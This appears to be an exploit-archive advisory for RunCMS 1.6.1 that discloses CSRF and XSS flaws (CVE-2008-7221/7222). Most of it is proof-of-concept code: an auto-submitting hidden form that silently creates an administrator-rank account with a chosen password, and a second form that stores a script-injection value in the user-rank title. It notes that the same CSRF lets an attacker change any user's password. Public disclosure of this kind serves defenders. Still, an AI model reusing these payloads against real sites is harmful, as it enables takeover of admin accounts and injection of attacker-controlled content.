RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties

2009.09.15

Credit: nbbn

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2008-7221 | CVE-2008-7222

CWE: CWE-352
CWE-79

######
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties           by NBBN
######

[b]
1) Create Webmaster (admin) XSRF Vulnerability[/b]
<html><head></head><body onLoad="javascript:document.attack.submit()">
<form action="http://localhost/xampp/runcms/modules/system/admin.php" 
method="post" enctype="multipart/form-data" name="r">
<input type="hidden" name="uname" value="Attacker">
<input type="hidden" name="name" value="Attacker">
<input type="hidden" name="email" value="attack (at) attack (dot) com [email concealed]">
<input type="hidden" name="url" value="">
<input type="hidden" name="user_avatar" value="blank.gif">
<input type="hidden" name="theme" value="helloween">
<input type="hidden" name="timezone_offset" value="0">
<input type="hidden" name="language" value="deutsch">
<input type="hidden" name="user_icq" value="">
<input type="hidden" name="user_aim" value="">
<input type="hidden" name="user_msnm" value="">
<input type="hidden" name="user_from" value="">
<input type="hidden" name="user_occ" value="">
<input type="hidden" name="user_intrest" value="">
<input type="hidden" name="user_birth%5b2%5D" value="">
<input type="hidden" name="user_birth%5B1%5D" value="">
<input type="hidden" name="user_birth%5BO%5D" value="">
<input type="hidden" name="user_sig" value="">
<input type="hidden" name="umode" value="flat">
<input type="hidden" name="uorder" value="1">
<input type="hidden" name="bio" value="">
<input type="hidden" name="rank" value="7">
<input type="hidden" name="pass" value="Password">
<input type="hidden" name="pass2" value="Password">
<input type="hidden" name="fct" value="users">
<input type="hidden" name="op" value="addUser">
<input type="hidden" name="submit" value="%DCbernehmen">

Also with XSRF an attacker can update the profile of all users. He can change 
the password etc...

[b]2) Cross-Site Scripting (an attacker can only attack an admin)[/b]
<html><head></head><body onLoad="javascript:document.r.submit()">
<form action="http://localhost/xampp/runcms/modules/system/admin.php" 
method="post" enctype="multipart/form-data" name="r">
<input type="text" class="text" name="rank_title" size="30" maxlength="50" 
value="<marquee>Cross-Site Scritping :-("/>
<input type="hidden" name="fct" value="userrank">
<input type="hidden" name="op" value="RankForumAdd">
</form>
</body>

References:

http://xforce.iss.net/xforce/xfdb/40630

http://www.securityfocus.com/bid/27852

http://www.securityfocus.com/archive/1/archive/1/488287/100/200/threaded

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.